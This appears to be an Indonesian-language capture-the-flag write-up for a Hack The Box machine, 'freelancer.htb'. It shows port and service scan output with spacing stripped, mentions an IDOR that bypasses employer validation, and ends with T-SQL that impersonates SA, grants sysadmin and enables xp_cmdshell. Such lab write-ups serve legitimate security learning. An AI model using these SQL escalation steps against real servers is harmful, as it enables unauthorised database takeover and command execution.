Recon awal selalu pakai port scanning dan jika port http open kita dapat melakukan dirsearch.
naabu--host10.129.57.150-v-p--nmap-cli'nmap -sV'-o10.129.57.150.port____________//____/_\/_\/_\/_\/////_//_/\_,_/\_,_/_.__/\_,_/projectdiscovery.io[INF] Current naabu version 2.3.1 (latest)[INF] Running CONNECT scan with non root privileges10.129.57.150:4967110.129.57.150:4966710.129.57.150:326810.129.57.150:5310.129.57.150:5294110.129.57.150:938910.129.57.150:598510.129.57.150:63610.129.57.150:326910.129.57.150:59310.129.57.150:4967010.129.57.150:13510.129.57.150:4967210.129.57.150:13910.129.57.150:44510.129.57.150:8010.129.57.150:8810.129.57.150:5294510.129.57.150:38910.129.57.150:5582010.129.57.150:55824[INF] Found 21 ports on host 10.129.57.150 (10.129.57.150)[INF] Running nmap command: nmap -sV -p 55820,636,49670,139,49671,3268,135,52945,55824,9389,593,5985,3269,389,445,88,52941,49667,49672,53,80 10.129.57.150StartingNmap7.95 ( https://nmap.org ) at 2024-06-02 20:44 WIBNmapscanreportforfreelancer.htb (10.129.57.150)Hostisup (0.30s latency).PORTSTATESERVICEVERSION53/tcpopendomainSimpleDNSPlus80/tcpopenhttpnginx1.25.588/tcpopenkerberos-secMicrosoftWindowsKerberos (server time:2024-06-0218:44:16Z)135/tcpopenmsrpcMicrosoftWindowsRPC139/tcpopennetbios-ssnMicrosoftWindowsnetbios-ssn389/tcpopenldapMicrosoftWindowsActiveDirectoryLDAP (Domain: freelancer.htb0.,Site:Default-First-Site-Name)445/tcpopenmicrosoft-ds?593/tcpopenncacn_httpMicrosoftWindowsRPCoverHTTP1.0636/tcpopentcpwrapped3268/tcpopenldapMicrosoftWindowsActiveDirectoryLDAP (Domain: freelancer.htb0.,Site:Default-First-Site-Name)3269/tcpopentcpwrapped5985/tcpopenhttpMicrosoftHTTPAPIhttpd2.0 (SSDP/UPnP)9389/tcpopenmc-nmf.NETMessageFraming49667/tcpopenmsrpcMicrosoftWindowsRPC49670/tcpopenncacn_httpMicrosoftWindowsRPCoverHTTP1.049671/tcpopenmsrpcMicrosoftWindowsRPC49672/tcpopenmsrpcMicrosoftWindowsRPC52941/tcpfilteredunknown52945/tcpfilteredunknown55820/tcpopenmsrpcMicrosoftWindowsRPC55824/tcpopenmsrpcMicrosoftWindowsRPCServiceInfo:Host:DC;OS:Windows;CPE:cpe:/o:microsoft:windowsServicedetectionperformed.Pleasereportanyincorrectresultsathttps://nmap.org/submit/.Nmapdone:1IPaddress (1 hostup) scanned in 63.38 seconds
hasil dirsearch kepada port 80.
terdapat port 80 lgsg kita pentest saja, terdapa bug validation idor. ketika kita register menjadi employer tidak akan bisa karna butuh divalidasi. lgsg saja kita akses
EXECUTE AS LOGIN = 'SA'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'
-- this turns on advanced options and is needed to configure xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
-- this enables xp_cmdshell
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE